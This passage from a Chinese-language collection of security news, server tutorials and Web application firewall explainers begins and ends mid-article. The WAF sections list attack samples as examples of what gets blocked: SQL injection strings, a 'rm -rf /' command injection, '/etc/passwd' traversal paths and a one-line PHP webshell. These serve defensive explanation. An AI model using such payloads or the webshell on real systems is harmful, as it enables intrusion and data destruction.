.top 域名比上次报告增加了 4 个百分点。 Interisle 表示,.top 稳定的域名大约有 276 万个,其中有 11.7 万多个是钓鱼网站。 #### TP-Link多款路由器曝零日漏洞,存在远程代码执行风险 据科技媒体BleepingComputer于9月4日发布的最新报告显示,知名网络设备制造商TP-Link已确认其多款路由器产品存在一项尚未修复的零日安全漏洞。该漏洞属于堆栈缓冲区溢出类型,主要影响设备的CWMP(CPE广域网管理协议)功能模块,可被用于实施远程代码执行(RCE)攻击。此次漏洞由独立安全研究员Mehrun(昵称ByteRay)借助自动化污点分析技术发现,并于2024年5月11日正式向厂商披露。研究指出,问题根源在于CWMP协议实现过程中缺乏必要的输入边界校验机制。攻击者可通过构造异常超长的SOAP请求消息,突破系统防护边界,最终触发远程代码执行。具体攻击路径显示,不法分子既可利用旧版固件存在的既有漏洞,也可通过破解设备的默认登录凭证获取控制权。成功入侵后,攻击者可将受害设备重定向至恶意搭建的CWMP服务器,随后发送特制超长SOAP载荷引发缓冲区溢出。一旦获得路由器控制权,攻击者能够实施多种高危操作,包括但不限于篡改DNS解析结果、拦截未加密的网络流量,甚至向网页会话中注入恶意代码。目前已知受该漏洞影响的设备型号涵盖Archer AX10、AX1500、EX141、Archer VR400及TD-W9970等系列,其中部分型号仍在全球市场持续销售。值得注意的是,鉴于CWMP协议在不同产品线中的广泛采用,实际受影响的设备范围可能更为广泛,但截至目前官方尚未为此漏洞分配CVE编号。针对这一严重安全隐患,TP-Link方面回应称正积极评估漏洞的实际威胁程度及暴露条件,重点核查CWMP功能的默认启用状态。虽然欧洲版本设备的修补方案已完成开发,但面向美国及其他国际市场的版本适配工作仍在进行中,具体修复时间表尚未公布。网络安全专家提醒,由于该漏洞可直接导致设备完全沦陷,建议相关用户密切关注厂商公告,及时更新固件版本,并采取强化密码策略、关闭不必要的远程管理端口等防护措施降低风险。 #### TTFB-首字节时间简介与优化方法 TTFB-首字节时间简介百度站长工具里看到有一个“首字节时间”的建议,第一次听说,还真不知道是什么东东。百度站长工具里面的解释是:“浏览器开始收到服务器响应数据的时间=后台处理时间+重定向时间,是反映服务端响应速度的重要指标”。看到这个解释,隐隐约约明白了什么意思,下面就用自己的话说一下我的理解(如果有人有权威解释,发现本解释错误,还望指正)。“首字节时间”顾名思义就是在浏览器输入目标网站的网址并回车后(或者搜索页面点击打开新的目标页面时)直到获得首个字节的时间。再解释一下,后台处理时间(这应该是浏览器访问目标网站网址时,发出请求,域名服务器的处理时间,将请求发送到目标网站所在服务器ip),重定向时间(这应该是域名服务器将请求发送到目标网站服务器后,如果服务器有重定向设置,就处理重定向的时间)。“首字节时间”简单的理解就是,访问目标网站时,从发出请求到自己电脑获得网站响应的首字节这段时间。总而言之,言而总之,首字节时间当然是越短了越好。就像百度自己的解释,这是反映服务端响应速度的重要指标。首字节时间越短,表明服务器端(域名DNS服务器和网站服务器)响应速度越快,反之越长,表明服务器端响应速度慢。当然是越快了对网站访问体验来说越好了!如测量网站的第一字节响应时间(TTFB)较长,可通过以下三块内容进行改善:如何优化TTFB首字节时间一、CDN减少内容和访问者之间的“距离” 将静态内容分发到CDN,CDN的内容自动复制到各个位置,在地理上更接近用户,从而减少TTFB的时间。      二、优化后端基础设施的性能减少服务器处理及响应时间 (1)避免网站与其他网站共享同一个服务器其他网站会占用自身网站服务器处理时间; (2)避免网站使用虚拟主机系统如网站在一段时间未有流量产生,系统会推迟或暂停虚拟服务器,当新访客进入时,将重新进行服务器备份处理(10s或更长时间); 三、后端优化软件性能减少服务器生成的响应到浏览器的时间 (1)操作码缓存; (2)服务器端缓存; (3)本地缓存; (4)W3总缓存; (5)Batcache整页缓存; #### Tunefab 音乐翻录工具配置文件错误遭黑客入侵 据最新报道,Tunefab音乐翻录工具因为配置文件错误,导致大量用户数据泄露。Tunefab主要用于翻录Spotify、Apple Music等流媒体平台音频,并能绕过音频文件的DRM保护,将相关文件以多种格式转换至用户设备上。 在今年9月26日,Tunefab错误地配置了MongoDB数据库文件,使得自家数据库处于“无密码”状态,此后相关数据库被公共物联网搜索引擎索引。在事件曝光后,Tunefab迅速修改了数据库配置,但为时已晚。 此次事件共计泄露280GB用户个人数据,据称涉及超过1.51亿条用户IP、ID、邮箱地址等信息。然而,目前尚未听到Tunefab就此事做出进一步解释或说明。 对于用户来说,这无疑是一次严重的隐私侵犯事件,提醒我们在使用各类软件时,尤其是涉及到个人敏感信息的软件,一定要注意安全,定期检查是否有异常情况出现,及时更新软件版本,以防止类似事件再次发生。 #### Twitter确认宕机,但没有证据表明存在网络攻击或安全漏洞 据外媒报道,日前,许多Twitter用户突然无法访问该服务平台。虽然老Twitter用户还记得这个社交媒体网站的“fail whale(故障的鲸鱼)”经常出现的时候,但现阶段它通常是稳定的,最近一次重大问题则是因7月份的安全漏洞而出现过。 现在Twitter的API状态页面报告指出,该公司正在“调查Twitter API的违规行为”,而据中断跟踪器Down Detector称,在美国东部时间下午5点35分左右,feed似乎已经变暗。 跟往常一样,当Twitter宕机时,首要的问题是,当平台宕机时用户可以去哪里讨论? 在Twitter开发者论坛上,工作人员Jessica Garson表示:“感谢您的联系,我们目前已经意识到这个问题,我们正在努力尽快解决这个问题。有几个端点似乎已经回来了。” 在一份声明中,一位发言人表示:“我们知道人们在使用Twitter和发推文上遇到了麻烦。我们正在努力尽快解决这个问题。我们会分享更多,可以的时候会通过@TwitterSupport发布,敬请期待。” Twitter的官方状态页面也被更新以反映这一事件,另外它还特别指出:“我们没有证据表明这次中断是由安全漏洞或黑客造成的。我们目前正在调查内部原因并将很快会公布更多。” 我们还没有收到官方的更新,但至少对一些用户来说,这项服务已经开始工作了。已经恢复正常的推特账号@TwitterSupport更新了推文,称“很多人的Twitter已经瘫痪了,我们正在努力让它恢复正常运行。我们的内部系统出现了一些问题,目前没有任何证据表明存在安全漏洞或黑客行为。” #### ubuntu开启、关闭防火墙方法 这篇文章主要给大家介绍了关于如何开启、关闭ubuntu防火墙的相关资料,文中将ubuntu系统中防火墙的安装以及使用介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧。 前言 防火墙(Firewall),也称防护墙。它是一种位于内部网络与外部网络之间的网络安全系统。一项信息安全的防护系统,依照特定的规则,允许或是限制传输的数据通过。 防火墙对于我们的网络安全的重要性不言而喻 但是在实际的开发过程中 我们有可能会 需要开启、关闭防火墙 那么 Ubuntu中怎么管理防火墙呢。下面就来一起看看吧。 安装方法 1 sudo apt-get install ufw   当然,这是有图形界面的(比较简陋),在新立得里搜索gufw试试…… 使用方法 1 启用 ? 1 2 sudo ufw enable sudo ufw default deny 作用:开启了防火墙并随系统启动同时关闭所有外部对本机的访问(本机访问外部正常)。 2 关闭 ? 1 sudo ufw disable 2 查看防火墙状态 ? 1 sudo ufw status 3 开启/禁用相应端口或服务举例  sudo ufw allow 80 允许外部访问80端口 sudo ufw delete allow 80 禁止外部访问80 端口 sudo ufw allow from 192.168.1.1 允许此IP访问所有的本机端口 sudo ufw deny smtp 禁止外部访问smtp服务 sudo ufw delete allow smtp 删除上面建立的某条规则 sudo ufw deny proto tcp from 10.0.0.0/8 to 192.168.0.1 port 22 要拒绝所有的TCP流量从10.0.0.0/8 到192.168.0.1地址的22端口 可以允许所有RFC1918网络(局域网/无线局域网的)访问这个主机(/8,/16,/12是一种网络分级): ? 1 2 3 sudo ufw allow from 10.0.0.0/8 sudo ufw allow from 172.16.0.0/12 sudo ufw allow from 192.168.0.0/16 推荐设置 1 2 3 sudo apt-get install ufw sudo ufw enable sudo ufw default deny 这样设置已经很安全,如果有特殊需要,可以使用sudo ufw allow开启相应服务。 总结 以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,如果有疑问大家可以留言交流,谢谢大家对主机吧的支持。 #### Ubuntu系统服务器添加swap分区的方法 这篇文章主要介绍了Ubuntu添加swap分区的方法,提高服务器响应速度和防止应用程序内存不足错误的最简单方法之一是添加一些交换空间,非常具有实用价值,需要的朋友可以参考下 首先来了解一下什么是Swap Swap分区(也称交换分区)是硬盘上的一个区域,被指定为操作系统可以临时存储数据的地方,这些数据不能再保存在RAM中。 基本上,这使您能够增加服务器在工作“内存”中保留的信息量,但有一些注意事项,主要是当RAM中没有足够的空间容纳正在使用的应用程序数据时,将使用硬盘驱动器上的交换空间。 写入磁盘的信息将比保存在RAM中的信息慢得多,但是操作系统更愿意将应用程序数据保存在内存中,并使用交换旧数据。 总的来说,当系统的RAM耗尽时,将交换空间作为回落空间可能是一个很好的安全网,可防止非SSD存储系统出现内存不足的情况。 具体步骤和命令如下: # 创建一个空文件,具体大小的话对于小内存机器建议为内存的两倍 (例子中 1K * 4M = 4 GiB). sudo mkdir -v /var/cache/swap cd /var/cache/swap sudo dd if=/dev/zero of=swapfile bs=1K count=4M sudo chmod 600 swapfile # 将新建的文件转换为 swap 文件. sudo mkswap swapfile # 开启 swap. sudo swapon swapfile # 通过 swapon 或者 top 命令进行验证: swapon -s # 或者 top -bn1 | grep -i swap # 会显示类似信息: KiB Swap: 4194300 total, 4194300 free # 禁用 swap 时可以使用 sudo swapoff swapfile. # 将该分区设置成开机加载. echo "/var/cache/swap/swapfile none swap sw 0 0" | sudo tee -a /etc/fstab # 测试开机加载: sudo swapoff swapfile sudo swapon -va 以上就是本文的全部内容,希望对大家的学习有所帮助. #### UDP 协议被曝漏洞:可被利用发起DDoS攻击,预估影响全球 30 万台联网主机及其网络 UDP 协议漏洞详情 近期,CISPA Helmholtz 信息安全中心的安全专家在用户数据报协议(UDP)中发现了安全漏洞,追踪编号为 CVE-2024-2169,预估可能影响全球 30 万台联网主机及其网络。 Loop DoS 攻击 安全专家构建了一种名为“Loop DoS”的新型拒绝服务攻击,这种攻击主要针对应用层协议。它能够将网络服务配对成一个无限的通信环路,从而产生大量的流量。 如何利用 UDP 协议漏洞 “Loop DoS”攻击主要利用了 UDP 协议中的漏洞,由于没有提供足够的数据包验证,因此非常容易实现 IP 欺骗。利用这个漏洞的攻击者可以创建一个自我持续机制,无限制地产生过大的流量,并且无法阻止,从而导致目标系统甚至整个网络出现拒绝服务(DoS)的情况。 可能的影响 Loop DoS 攻击主要依赖于 IP 欺骗,可以由单台主机发送一条信息启动通信。卡内基梅隆 CERT 协调中心(CERT / CC)指出,攻击者利用这个漏洞可能会导致以下三种结果: 易受攻击的服务超负荷运行,导致服务不稳定或无法使用。 对网络主干进行 DoS 攻击,导致其他服务网络中断。 放大攻击,包括网络环路造成放大的 DOS 或 DDOS 攻击。 请注意,这是一个严重的安全问题,需要及时采取措施进行防护。 #### Unsplash全球最大的免费下载商用摄影图库网站 还在担心哪天网站的图片因为侵权被起诉赔偿吗?现在有了Unsplash你再也不用担心了!Unsplash是一个可以免费下载高清商用摄影图片的网站,网站上图片都是来源于真实摄影,所有人都可以去下载使用而无需担心版权问题。同时这个网站也是全球最大的图片分享中心,很多图片都可以直接下载当作壁纸,非常值得推荐!也是设计师必备网站之一! 官方网址:https://unsplash.com/ 源于:国外 #### Verizon 网络部分用户遭到黑客攻击, 甚至被盗刷信用卡 10 月 13 日消息,根据外媒 The Verge 报道,近日部分美国 Verizon 运营商的用户在社交媒体上表示,他们在使用 Verizon Visible 服务时,遭受了黑客攻击,导致手机设备出现故障,设置被更改,手机被锁定。甚至有用户表示被盗刷了信用卡,丢失了 1000 美元。 Visible 是 Verizon 旗下的一项全数字无线运营商业务,支持 4G LTE 网络。该服务在美国按月收费,每月 40 美元(约 258 元人民币)可以获得无限流量、短信和通话时长,同时兼容苹果和安卓手机。从本周一开始,推特和 Reddit 论坛上的一些用户报告称,他们从收到了 Verizon 通知更改密码的电子邮件,此外在之后用户很难联系到该公司的人工客服询问。 IT之家了解到,截至目前,Visible 官方已经承认了该网络受到黑客攻击的情况,一名员工在当地时间周一下午发表了一份声明,表示只有极少数用户遭受了黑客攻击,但是公司系统和网络没有被破坏,因此建议用户更改账号密码,并查看其它互联网服务的账号密码。但是,外媒表示有很多用户反馈称其密码重置系统也无法正常工作。Visible 今日表示,自家的聊天平台遇到了技术问题,无法对账户进行任何更改。官方正在解决这个问题,请用户耐心等待。 外媒预计,本次黑客攻击事件似乎与此前大规模用户数据泄露有关,建议用户开启账号的双重验证功能。 #### VMware 9.3 分 高危漏洞被紧急修复 3 月 10 日消息,博通(Broadcom)旗下 VMware 本周发布安全更新,针对 VMware ESXi 服务器等产品,修复多个安全漏洞。 VMware 于 3 月 4 日发布安全公告 VMSA-2025-0004,警告存在三个 0-day 漏洞(CVE-2025-22224、CVE-2025-22225 和 CVE-2025-22226),影响 VMware ESXi、Workstation 和 Fusion,且现有证据表明,已经有黑客利用 CVE-2025-22224 漏洞发起攻击,强烈建议用户尽快安装补丁。 CVE-2025-22224 漏洞是一个 Time-of-Check Time-of-Use(TOCTOU)漏洞,可能导致越界写入,VMware 将该漏洞评为严重级别,CVSSv3 基础评分高达 9.3。 Shadowserver 基金会警告称,超过 37000 台 VMware ESXi 服务器存在 CVE-2025-22224 漏洞风险。 截至 3 月 4 日,美国约有 3800 台未打补丁的 VMware ESXi 服务器。数据显示,漏洞服务器数量在 3 月 4 日至 7 日期间出现波动,先下降后上升,这一现象可能由于管理员在收到警告后暂时将服务器下线所致。 #### Vo1d 僵尸网络肆虐:已感染 226 个国家和地区 159 万台安卓电视 全球安卓电视生态遭重创:Vo1d僵尸网络升级版席卷226国,犯罪模式现产业化趋势 一、新型僵尸网络技术全面升级,威胁指数飙升网络安全机构Xlab于3月1日发布紧急报告,揭露Vo1d恶意软件僵尸网络已迭代出高危险变种。该变种通过融合RSA加密与自定义XXTEA算法的双重防护层,配合动态域名生成算法(DGA)的强化升级,成功突破传统安全防御体系。技术升级使其具备流量伪装、源头混淆等能力,可深度隐匿犯罪活动轨迹,目前已在全球226个国家和地区感染1,590,299台安卓电视设备,较2024年9月Dr. Web报告的130万台感染量增长22.3%。 二、感染版图持续扩张,南半球成重灾区数据显示,截至2025年2月,巴西以近25%的感染占比位居首位,南非(13.6%)、印度尼西亚(10.5%)等发展中国家密集上榜。更值得警惕的是,印度曾在2025年1月出现"爆炸式感染"——3天内受控设备从3,900台飙升至21.7万台,揭示攻击者具备区域性定向渗透能力。尽管当前活跃设备降至80万台,但僵尸网络基础设施仍保持高强度运行状态。 三、犯罪商业模式浮出水面:僵尸网络竟成"租赁资产"Xlab研究人员通过监测感染量波动规律,首次曝光Vo1d运营者的产业化运作链条。数据显示,特定时段内设备数量会呈现"短期激增后断崖下跌"的特征。深入分析表明,这源于犯罪组织将僵尸网络按区域切割为"子模块",以付费租赁形式提供给第三方进行代理服务器滥用、分布式拒绝服务攻击(DDoS)等非法活动。租约到期后,设备将自动回归主网络待命,形成"攻击即服务"的黑暗生态。 四、行业警示:智能设备安全防线亟待重构此次事件暴露出智能电视等物联网设备的系统性安全缺陷。专家呼吁设备制造商需强制实施固件签名验证、关闭高危端口等基础防护,同时建议用户定期更新系统并筛查异常流量。随着网络犯罪向专业化、服务化转型,全球协同打击与技术反制已成为应对新型威胁的必由之路。 #### VPS云服务器mysql root帐户无法远程登陆解决办法 一、独立IP的Vps、云主机、独立主机 首先远程登陆到服务器,放行服务器3306端口 警告:开启root远程登陆存在安全隐患,请将root密码尽可能设置复杂一点,或者将host值修改为您本地IP地址(如果您本地不是固定IP,修改后重新拨号联网IP会变更,也将无法远程连接)   1、Windows系统主机: 方法①、可以用phpmyadmin连接登陆mysql,选择mysql数据库,打开user表,选择您需要开启远程连接的用户,点快速编辑,将host列里面的值修改为%就可以完成。 方法②、使用命令方式进行修改,打开开始—运行—输入cmd回车,然后输入绿色方框里面的内容,注意包括分号在内,要英文状态下输入,黑色部分为系统显示。 mysql> use mysql; mysql> update user set host="%" where user="root"; mysql> flush privileges; 2、Linux系统的主机: Linux系统的预装WD系统的可以登陆控制面板后点击网站管理中的phpmyadmin 或者直接访问http://赠送的二级域名:8080/phpmyadmin/输入mysql账号密码进行登陆,接下来操作和独立IP方法①一致,命令方式和windows系统方法②一致,只是不是在cmd下执行,而是ssh远程登陆后直接运行命令。 #### VPS云服务器重启后数据盘不见了解决办法 当用户在自主管理平台点击关机或者重启时候,相当于是对服务器断电关机然后重启操作,任何设备在正常运行时候,对磁盘有读写的时候,强制断电或关机就很有可能导致逻辑设备脱落的情况。 磁盘丢失原因: 大多数情况下是因为咱们对服务器关机的时候没有将系统中正在运行的一些应用程序关掉,当服务器中有相关程序在运行,强制关机或者重启就很有可能会导致数据盘脱机。当然这种情况不是每次都会发生,只有在客户服务器中正在运行一些应用或者服务的时候,突然间在管理平台执行重启或者关机才会有这样的情况发生。当出现这样的情况的时候,用户按照下述操作即可解决。 磁盘挂载办法: (1) 这是我们新买的一台云服务器,数据盘大小为20G (2). 当系统中一些程序在运行时候我们在管理平台点击重启 此时发现数据盘不在了,用户无须担心,看下一步 (3). 点击左下角服务器管理: (4). 选择磁盘管理: (5). 此时发现数据盘磁盘1为脱机状态,鼠标放至磁盘1右键“联机” 此时再过来看计算机里面,数据盘已经存在,数据完好无损。 首先,用户所购买的产品是没有问题的,只是在对云服务器或者VPS操作时候,尤其在关机或者重启时候,将系统中运行的额外程序服务关掉,然后在系统内部正常关机即可避免此类事情的发生。 #### WAF拦截设置中URI与URI Path的区别 在 Web 应用防火墙 (WAF) 的拦截设置中,URI (Uniform Resource Identifier) 和 URI Path 是两个密切相关但有重要区别的概念,理解它们对于精确配置规则至关重要: URI (Uniform Resource Identifier) 定义: 这是标识网络资源的完整字符串。它包含了访问该资源所需的所有组成部分。 组成: 一个完整的 URI 通常包括: Scheme: http://, https://, ftp:// 等。 Host: 域名或 IP 地址 (例如 www.example.com, 192.168.1.1)。 Port: (可选,如果使用标准端口如 80 或 443 则通常省略) 例如 :8080。 Path: 资源在服务器上的具体路径 (例如 /products/index.html, /api/v1/users)。 Query String: (可选) 以 ? 开头,包含传递给资源的参数 (例如 ?id=123&category=books)。 Fragment: (可选) 以 # 开头,通常用于指定资源内部的某个锚点 (例如 #section2),注意:Fragment 通常不会被发送到服务器。 WAF 中的含义: 当 WAF 规则指定匹配 URI 时,它通常指的是包含 Path + Query String 的部分(有时也可能包括 Port,但 Scheme 和 Host 通常在更早的 HTTP 头部处理阶段被处理或用于路由,而不直接作为 URI 规则匹配的一部分)。最重要的是它包含了查询参数 (? 后面的部分)。 示例: https://www.example.com:8080/products/search?q=shoes&sort=price#results 这个 URI 中,WAF 规则匹配的 URI 部分通常是 /products/search?q=shoes&sort=price (Path + Query String)。 URI Path 定义: 这是 URI 中特定于资源位置的部分,它标识了目标资源在服务器上的路径或端点。 组成: 仅包含从域名/IP地址之后的第一个 / 开始,到 ? (查询字符串开始) 或 # (片段开始) 或字符串结束为止的部分。它不包含 Scheme, Host, Port, Query String 或 Fragment。 WAF 中的含义: 当 WAF 规则指定匹配 URI Path 时,它只关注资源的路径部分,完全忽略查询字符串 (? 后面的所有内容)。 示例: 对于同一个 URI https://www.example.com:8080/products/search?q=shoes&sort=price#results,WAF 规则匹配的 URI Path 部分只是 /products/search。 核心区别总结: 特性URI (在 WAF 上下文中)URI Path包含内容Path + Query String (可能包含 Port)仅 Path是否包含查询参数 (? 后)是否用途匹配包含特定参数的特定资源请求匹配特定位置或端点的所有请求示例 (基于请求)/login.php?username=admin/login.php/api/data?id=456/api/data/search?q=attack%20string/search 为什么在 WAF 中这个区别至关重要? 精确匹配 vs. 范围匹配: 使用 URI Path 规则可以拦截访问某个特定路径(如后台管理页面 /admin/、敏感 API 端点 /api/internal/)的所有请求,无论它们带有什么参数。这用于保护特定区域。 使用 URI 规则可以更精确地拦截带有特定参数的请求。例如: 拦截尝试进行 SQL 注入的请求:/products/view?id=1' OR '1'='1 (需要匹配查询字符串中的恶意负载)。 拦截尝试访问特定敏感资源的请求:/download?file=../../etc/passwd (路径遍历攻击依赖于参数值)。 拦截带有特定令牌或标识符的请求。 避免误拦截: 如果只想阻止访问 /admin/ 目录下的所有内容,使用 URI Path /admin/* 是正确且安全的,不会影响类似 /user/profile?section=admin 这样的合法请求(该请求的 Path 是 /user/profile)。 如果错误地使用 URI 规则去匹配路径,并设置规则为包含 admin,那么 /user/profile?section=admin 也会被错误拦截,因为它整个 URI 字符串包含了 admin。 性能与效率: 匹配 URI Path 通常更快,因为字符串更短且不包含多变的查询参数。 匹配完整的 URI(包含 Query String)可能需要处理更长、变化更大的字符串。 实际配置建议: 明确目标: 首先要清楚你想拦截什么。 是想拦截某个特定位置的所有访问? -> 用 URI Path。 是想拦截带有特定恶意参数的请求? -> 用 URI (并确保规则能检查 Query String)。 查看产品文档: 不同 WAF 厂商对配置项的具体命名和行为可能略有差异。务必查阅你所使用的 WAF 文档,确认其“URI”和“Path”字段具体匹配的是哪一部分。 利用通配符: 两者通常都支持通配符 (*, ?) 或正则表达式来实现模式匹配(如 /admin/* 匹配 /admin/ 下所有路径,/search*.php 匹配各种 search 脚本)。 注意编码: WAF 在匹配之前通常会先对 URL 进行解码。攻击者可能对恶意负载进行编码(如 %20 代替空格,%27 代替单引号)。好的 WAF 规则会处理这些编码变体。 简单记忆: URI Path = 你去哪里? (/shop/cart, /api/login) URI (完整) = 你去哪里 + 带了什么条件? (/shop/cart?item=123&qty=5, /api/login?username=foo&password=bar) 正确理解并使用 URI 和 URI Path 的区别,是配置精准、高效且低误报的 WAF 防护规则的关键。 #### WAF防护是什么?2025年Web应用防火墙十大功能解析、与CDN区别对比及选型推荐指南 WAF防护(Web Application Firewall,Web应用防火墙) 是一种专门针对Web应用层的安全防护技术,用于实时监控、过滤和拦截针对Web应用程序的恶意流量和攻击行为。与传统的网络防火墙(基于IP/端口防护)不同,WAF专注于应用层(HTTP/HTTPS协议)的威胁防护,能够识别和阻断SQL注入、跨站脚本(XSS)、文件包含、恶意爬虫等常见Web攻击。 WAF的核心功能 攻击拦截: OWASP Top 10防护:防御SQL注入、XSS、CSRF(跨站请求伪造)、文件上传漏洞等主流Web攻击。 零日漏洞缓解:通过行为分析和规则引擎拦截未知攻击模式(如Log4j漏洞利用)。 API安全:保护RESTful API接口,防止数据泄露和未授权访问。 流量清洗: 识别并过滤恶意爬虫、CC攻击(高频请求)、暴力破解等异常流量。 支持自定义规则(如IP黑名单、URL访问频率限制)。 数据保护: 防止敏感数据泄露(如信用卡号、身份证号),支持数据脱敏和加密传输。 合规性支持(如GDPR、PCI DSS)。 WAF与CDN的区别 特性WAFCDN防护层级应用层(HTTP/HTTPS协议)网络层(DDoS防护、加速分发)主要功能拦截Web攻击、API安全、数据防泄漏内容缓存、负载均衡、DDoS清洗部署位置应用服务器前端或云端代理边缘节点典型场景保护网站后台、API接口加速静态资源、缓解流量型攻击 WAF的部署方式 云WAF(SaaS模式): 通过DNS解析或反向代理接入,无需本地硬件(如百度云防护 WAF、阿里云WAF)。 优势:快速部署、自动更新规则、弹性扩展。 适用场景:中小型企业、云原生应用。 硬件WAF: 部署在服务器前端的专用设备(如Imperva SecureSphere)。 优势:高性能、低延迟,适合高安全要求的本地化部署。 适用场景:金融机构、政府内网。 软件WAF: 基于开源方案(如ModSecurity)或集成在Web服务器(如Nginx插件)。 优势:成本低、灵活定制。 适用场景:技术团队较强的企业。 WAF的局限性 误报与漏报: 过于严格的规则可能导致正常请求被拦截(需人工优化规则库)。 新型攻击可能绕过静态规则(需依赖AI行为分析)。 性能损耗: 深度流量检测可能增加延迟(尤其是硬件WAF)。 无法替代其他安全措施: 需与代码安全(如漏洞扫描)、DDoS防护、入侵检测系统(IDS)结合使用。 典型WAF服务商推荐 百度云防护 WAF: 免费基础规则集,支持自定义防火墙规则,API防护,bot防护等。 Imperva: 全球领先的数据和应用网络安全公司,提供API安全专项防护(如Bot防御)。 阿里云WAF: 深度集成中国本地化需求,支持HTTPS证书自动管理。 AWS WAF: 与CloudFront CDN联动,按请求量计费,适合AWS生态用户。 百度云防护 Web应用防火墙WAF 防黑客入侵 CC攻击拦截 网络爬虫拦截[出售] ¥299 ¥399 库存:9.9k 已售:99.9k 人气:9.2 选型建议 中小型企业/个人站长:优先选择云WAF(如百度云防护 WAF),成本低且易用。 金融/政府机构:采用硬件WAF+定制规则,确保数据主权和合规性。 高频交互业务(如API服务):选择支持AI行为分析的WAF(如Imperva Advanced Bot Protection)。 通过部署WAF,可显著降低Web应用被攻击的风险,但需结合业务场景持续优化规则,并定期进行渗透测试以验证防护效果。 #### Web应用防火墙(WAF)能防御哪些攻击?10大常见攻击类型解析 Web应用防火墙(WAF)主要用于防护针对Web应用程序的各类攻击,其核心能力集中在应用层(OSI第7层)。以下是WAF能够防护的主要攻击类型及防护原理: 1. 注入攻击(Injection Attacks) SQL注入(SQLi)WAF检测请求中的恶意SQL语法(如' OR 1=1 --),阻止非法数据库查询。 命令注入(OS Command Injection)拦截包含系统命令(如; rm -rf /)的输入,防止执行恶意操作系统指令。 其他注入(LDAP、XPath等)过滤特殊字符和异常查询结构。 2. 跨站脚本攻击(XSS) 反射型/存储型/DOM型XSS检测请求和响应中的<script>标签、javascript:协议或恶意事件处理器(如onerror=),阻止脚本在用户浏览器执行。 3. 跨站请求伪造(CSRF) 通过验证请求来源(如Referer头)或检查CSRF令牌(需结合应用逻辑)来拦截伪造的会话请求。 4. 文件与路径遍历攻击 本地文件包含(LFI)/远程文件包含(RFI)阻止包含../、/etc/passwd等敏感路径的请求。 目录遍历(Directory Traversal)过滤异常路径跳转字符,限制访问Web根目录外的文件。 5. 不安全直接对象引用(IDOR) 检测异常参数(如user_id=1234被篡改为user_id=5678),防止未授权访问资源。 6. 安全配置漏洞 不安全的HTTP方法拦截危险方法(如PUT、DELETE)或强制使用安全头部(如Content-Security-Policy)。 CORS配置错误验证跨域请求的合法性,阻止恶意域名访问。 7. 敏感数据泄露 数据泄露防护屏蔽响应中的敏感信息(如信用卡号、身份证号),或对错误页面进行内容过滤。 8. API滥用 参数篡改/未授权访问验证API请求格式、参数合法性及身份认证(如JWT令牌校验)。 批量请求攻击限制API调用频率,防止数据爬取或资源耗尽。 9. 应用层DDoS攻击 HTTP洪流(CC攻击)基于速率限制、IP信誉库或行为分析识别异常流量(如短时间内大量GET /login请求)。 10. 其他高级攻击 Webshell上传检测文件上传中的恶意代码(如<?php system($_GET['cmd']); ?>)。 零日漏洞利用通过机器学习或行为分析识别异常请求模式(如异常参数长度或编码方式)。 暴力破解限制登录/注册页面的尝试频率(如同一IP每秒不超过5次请求)。 WAF的局限性 无法防护所有攻击:如业务逻辑漏洞、社会工程攻击等需结合其他措施(如代码审计、安全意识培训)。 规则依赖:需定期更新规则库以应对新型攻击。 性能影响:配置不当可能导致误拦截或延迟。 最佳实践 多层防御:结合防火墙、IDS/IPS、加密传输(HTTPS)等。 自定义规则:根据业务需求调整WAF策略(如放行特定API路径)。 日志监控:分析拦截日志,优化规则并发现潜在威胁。 通过合理配置,WAF能有效降低Web应用风险,但需作为整体安全体系的一部分运行。 百度云防护 Web应用防火墙WAF 防黑客入侵 CC攻击拦截 网络爬虫拦截[出售] ¥299 ¥399 库存:9.9k 已售:99.9k 人气:9.2 #### web网页应用常见安全攻击手段 一、攻击手段 主动攻击: 直接向应用服务器发起攻击,传入代码,比如OS注入、SQL注入。 被动攻击:诱导客户操作,向服务器发送植入非法代码的请求,比如CSRF、XSS。 主动与否的判断依据:攻击的直接发起者是普通用户还是攻击者。 JS注入 解决方法:HTML编码 如:<%=Html.Encode(feedback.Message)%> HTML5引入的新标签包括、、、 、等等,而这些标签又有一些有趣的属性,例如poster、autofocus、onerror、formaction、oninput,这些属性都可以用来执行javascript。这会导致XSS和CSRF跨域请求伪造。 1.SQL注入 非法修改SQL语句。 2.OS命令注入攻击 通过web应用调用操作系统命令,通过shell命令可以调用操作系统的其它程序,只要有能够调用shell函数的地方就有被攻击的风险。 3.HTTP首部注入 在响应首部加入换行符(HTTP换行符:%0D%0A),设置cookie信息,假冒用户。 (1)HTTP响应截断攻击:需要插入两个HTTP换行符,然后并排插入字符串发送,插入的字符串是伪造的响应主体(网页内容)。可以达到和跨站脚本攻击相同的效果。 4.邮件首部注入 向邮件首部To/Subject任意添加非法内容,可以对任意邮件发送广告邮件或者病毒邮件。 5.目录遍历攻击(directory traversal) 非法访问服务器其它文件路径,比如/etc/passed。 6.XSS(跨站脚本攻击,cross-site script) (1)表单 在URL添加JavaScript代码,获取用户表单信息,并且提交到攻击者的服务器。 (2)cookie 保护cookie:httponly——服务端设置Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly (3)显示伪造的图片、文章 xss防范: 方法一: 阻止 JavaScript 注入攻击的一种简单方法是重新在视图中显示数据时,用 HTML 编码任何网站用户输入的数据 如:<%=Html.Encode(feedback.Message)%> 使用 HTML 编码一个字符串的含意是什么呢?使用 HTML 编码字符串时,危险字符如 < 和 > 被替换为 HTML 实体,如 < 和 >。所以,当使用 HTML 编码字符串 。浏览器在解析编码的字符串时不再执行 JavaScript 脚本。而是显示无害的页面。 方法二: 除了在视图中显示数据时使用 HTML 编码数据,还可以在将数据提交到数据库之前使用 HTML 编码数据。 StringEscapeUtils.escapeHtml(“前台提交的数据”); 通常,人们喜欢使用本教程中讨论的第一种方法,而不喜欢使用第二种方法。第二种方法的问题在于在数据库中最终会保留 HTML 编码的数据。换言之,数据库中的数据会包含奇怪的字符。这有什么坏处呢?如果需要用除网页以外的形式显示数据库数据,则将遇到问题。例如,不能轻易在 Windows Forms 应用程序中显示数据。 7.会话固定攻击(session fixation) 访问登录页面,利用服务器返回的URL诱导用户前去认证,再用用户的会话ID去登录网站。 8.CSRF(跨站点请求伪造,cross-site request forgeries) 利用已经认证的用户,向应用服务器发送请求,完成相应操作,比如发表言论,购买。 1、验证HTTP Referer字段 